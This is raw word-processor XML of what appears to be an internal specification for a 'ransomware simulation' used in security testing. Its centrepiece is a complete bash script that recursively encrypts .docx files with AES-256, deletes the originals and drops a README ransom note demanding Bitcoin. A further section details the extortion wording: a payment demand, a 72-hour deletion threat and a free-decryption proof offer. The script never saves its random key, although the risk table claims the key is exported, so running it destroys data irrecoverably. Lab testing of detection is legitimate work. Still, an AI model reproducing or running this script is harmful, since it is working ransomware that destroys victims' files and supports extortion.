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283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Security Evaluation Task: Backup Encryption Script Assessment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Document Reference:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> SEC-EVAL-{PLACEHOLDER_DATE}-{PLACEHOLDER_INITIALS}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Classification:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Internal Use Only — Security Testing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Prepared by:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> {PLACEHOLDER_NAME}, Security Operations Team</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> {PLACEHOLDER_DATE}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1. Task Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">This document outlines the specifications and testing parameters for a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>backup encryption script</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> designed to simulate a realistic ransomware scenario for security evaluation purposes. The script is intended to be executed in a controlled, isolated lab environment to assess detection capabilities, response procedures, and recovery mechanisms. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>All testing must be conducted in accordance with the organization's authorized penetration testing policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="280" w:after="280"/>
        <w:ind w:start="280" w:end="280" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:bdr w:val="single" w:sz="24" w:space="14" w:color="E67E22"/>
          <w:shd w:fill="FEF9E7" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:bdr w:val="single" w:sz="24" w:space="14" w:color="E67E22"/>
          <w:shd w:fill="FEF9E7" w:val="clear"/>
        </w:rPr>
        <w:t>IMPORTANT:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="single" w:sz="24" w:space="14" w:color="E67E22"/>
          <w:shd w:fill="FEF9E7" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> This script is for authorized security testing only. Unauthorized use of encryption tools against production systems is strictly prohibited. All tests must be logged and approved by {PLACEHOLDER_APPROVER}. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2. Script Functional Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following table details the core functional requirements for the test script:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13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11"/>
        <w:gridCol w:w="3331"/>
        <w:gridCol w:w="3616"/>
        <w:gridCol w:w="2881"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3511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Requirement ID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Description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Expected Behavior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REQ-001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Recursive file discovery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 xml:space="preserve">Identify all </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>.docx</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> files within the target directory and subdirectories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PASS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REQ-002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AES-256-CBC encryption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Encrypt each file using OpenSSL with AES-256-CBC cipher and a randomly generated key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PASS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REQ-003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Original file deletion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 xml:space="preserve">Remove the original unencrypted </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>.docx</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> files after successful encryption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PASS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REQ-004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Ransom note creation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 xml:space="preserve">Generate a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>README.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> file in the root target folder with payment instructions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PASS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="351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REQ-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="333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Error logging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Log all encryption operations, failures, and file paths to a timestamped log file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PASS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Proposed Bash Script Structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The script shall be implemented as a single </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> file with the following logical sections. The placeholder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>{PLACEHOLDER_TARGET_DIR}</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> will be replaced with the actual test directory path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:ind w:start="200" w:end="200" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New;monospace" w:hAnsi="Courier New;monospace"/>
          <w:sz w:val="19"/>
          <w:bdr w:val="single" w:sz="2" w:space="10" w:color="D5DBDB"/>
          <w:shd w:fill="F4F6F7" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New;monospace" w:hAnsi="Courier New;monospace"/>
          <w:sz w:val="19"/>
          <w:bdr w:val="single" w:sz="2" w:space="10" w:color="D5DBDB"/>
          <w:shd w:fill="F4F6F7" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash # Security Evaluation Script - Ransomware Simulation # Author: {PLACEHOLDER_NAME} # Version: 1.0 # Date: {PLACEHOLDER_DATE} TARGET_DIR="{PLACEHOLDER_TARGET_DIR}" LOG_FILE="encryption_log_$(date +%Y%m%d_%H%M%S).log" RANSOM_NOTE="README.txt" ENCRYPTION_KEY=$(openssl rand -hex 32) IV=$(openssl rand -hex 16) echo "[$(date)] Starting encryption process..." &gt;&gt; "$LOG_FILE" # Recursively find and encrypt .docx files find "$TARGET_DIR" -type f -name "*.docx" | while read -r file; do encrypted_file="${file}.enc" openssl enc -aes-256-cbc -K "$ENCRYPTION_KEY" -iv "$IV" -in "$file" -out "$encrypted_file" if [ $? -eq 0 ]; then rm -f "$file" echo "[$(date)] ENCRYPTED: $file" &gt;&gt; "$LOG_FILE" else echo "[$(date)] FAILED: $file" &gt;&gt; "$LOG_FILE" fi done # Create ransom note cat &gt; "$TARGET_DIR/$RANSOM_NOTE" &lt;&lt; EOF YOUR FILES HAVE BEEN ENCRYPTED. To recover your documents, send 1 BTC to wallet {PLACEHOLDER_BTC_ADDRESS}. Contact {PLACEHOLDER_EMAIL} for decryption key. EOF echo "[$(date)] Ransom note created at $TARGET_DIR/$RANSOM_NOTE" &gt;&gt; "$LOG_FILE" echo "[$(date)] Encryption complete." &gt;&gt; "$LOG_FILE" </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4. Testing Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The evaluation will proceed through the following phases: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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Preparation:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Create a test directory containing at least 20 sample </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> files with varying sizes (1 KB to 5 MB). Each file shall contain the text: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>"This is a test document."</w:t>
      </w:r>
      <w:r>
        <w:rPr/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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Execution:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Run the script with elevated privileges in a sandboxed virtual machine. Monitor system calls, file I/O, and network activity using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>strace</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>auditd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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Verification:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Confirm that all original </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> files are deleted and replaced with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.enc</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> encrypted counterparts. Validate encryption using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>openssl enc -d</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> with the known key.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2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Detection Testing:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Evaluate whether endpoint detection and response (EDR) tools flag the script as malicious based on behavioral patterns. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5. Risk Assessment &amp; Mitigations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82"/>
        <w:gridCol w:w="3061"/>
        <w:gridCol w:w="4696"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3582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Risk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Severity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Accidental encryption of production files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>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:color w:val="E74C3C"/>
              </w:rPr>
              <w:t>Critical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 xml:space="preserve">Restrict script execution to a dedicated VM with no network access to production shares. Use absolute path targeting only </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>C:\TestLab\Documents</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>.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Key loss preventing decryption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>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:color w:val="E67E22"/>
              </w:rPr>
              <w:t>High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Automatically export encryption key and IV to a secure, encrypted USB drive before deletion of originals. Store backup in a sealed envelope.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Unintended propagation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>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:color w:val="F39C12"/>
              </w:rPr>
              <w:t>Medium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 xml:space="preserve">Disable all network interfaces on the test VM. Use </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>chroot</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> or containerization to limit filesystem scope.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/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Log file exposure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>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:color w:val="3498DB"/>
              </w:rPr>
              <w:t>Low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Ensure log files are written to a directory with restricted permissions (700). Purge logs after evaluation.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Ransom Note Content Specification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>README.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> file must contain the following elements to simulate a realistic ransom demand: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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Header:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> "YOUR FILES HAVE BEEN ENCRYPTED" in uppercase bold text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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Demand:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Payment of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1 Bitcoin</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> to wallet address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>{PLACEHOLDER_BTC_ADDRESS}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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Contact:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Email address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>{PLACEHOLDER_EMAIL}</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> for decryption key after payment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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Threat:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Warning that files will be permanently deleted if payment is not received within </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>72 hours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2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Proof:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Offer to decrypt one file for free as proof of capability </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:start="240" w:end="240" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:i/>
          <w:bdr w:val="single" w:sz="24" w:space="12" w:color="2980B9"/>
          <w:shd w:fill="EAF2F8" w:val="clear"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:bdr w:val="single" w:sz="24" w:space="12" w:color="2980B9"/>
          <w:shd w:fill="EAF2F8" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> The ransom note is for simulation purposes only. No actual payment should be requested or accepted. The wallet address and email are placeholders that will be replaced with test values. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7. Post-Test Recovery Procedure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>After the evaluation is complete, the following steps must be executed to restore the environment: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/>
        <w:t xml:space="preserve">Decrypt all </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.enc</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> files using the stored key and IV: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>openssl enc -d -aes-256-cbc -K {KEY} -iv {IV} -in file.enc -out file.docx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/>
        <w:t xml:space="preserve">Verify file integrity by comparing MD5 hashes with pre-encryption checksums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869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Remove the ransom note, log files, and any temporary artifacts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2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Document all findings in a final report and present to {PLACEHOLDER_REVIEWER} </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>8. Approval Signatures</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="142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41"/>
        <w:gridCol w:w="3751"/>
        <w:gridCol w:w="3151"/>
        <w:gridCol w:w="3796"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3541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Role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Name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Signature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Heading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2980B9" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/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Security Operations Lead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{PLACEHOLDER_NAME}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_________________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{PLACEHOLDER_DATE}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/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IT Infrastructure Manager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{PLACEHOLDER_IT_MANAGER}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_________________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{PLACEHOLDER_DATE}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="354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Compliance Officer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{PLACEHOLDER_COMPLIANCE}</w:t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_________________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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_DATE}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="720" w:after="200"/>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="18"/>
          <w:bdr w:val="single" w:sz="2" w:space="8" w:color="BDC3C7"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="18"/>
          <w:bdr w:val="single" w:sz="2" w:space="8" w:color="BDC3C7"/>
        </w:rPr>
        <w:t>This document contains confidential information intended for authorized security personnel only. Distribution outside of the security evaluation team is prohibited without written consent from {PLACEHOLDER_DEPARTMENT}. Document generated on {PLACEHOLDER_DATE}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="720" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="18"/>
          <w:bdr w:val="single" w:sz="2" w:space="8" w:color="BDC3C7"/>
        </w:rPr>
        <w:t>End of Document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2160" w:after="2160"/>
      <w:ind w:start="2160" w:end="2160" w:hanging="0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2980B9"/>
      </w:pBdr>
      <w:spacing w:before="480" w:after="283"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans Unicode MS" w:hAnsi="Liberation Sans Unicode MS"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2C3E50"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DejaVu Sans" w:cs="Noto Sans Devanagari"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="34495E"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280" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="DejaVu Sans" w:cs="Noto Sans Devanagari"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2C3E50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978" w:leader="none"/>
        <w:tab w:val="right" w:pos="1179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978" w:leader="none"/>
        <w:tab w:val="right" w:pos="1179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979" w:leader="none"/>
        <w:tab w:val="right" w:pos="1179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20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2980B9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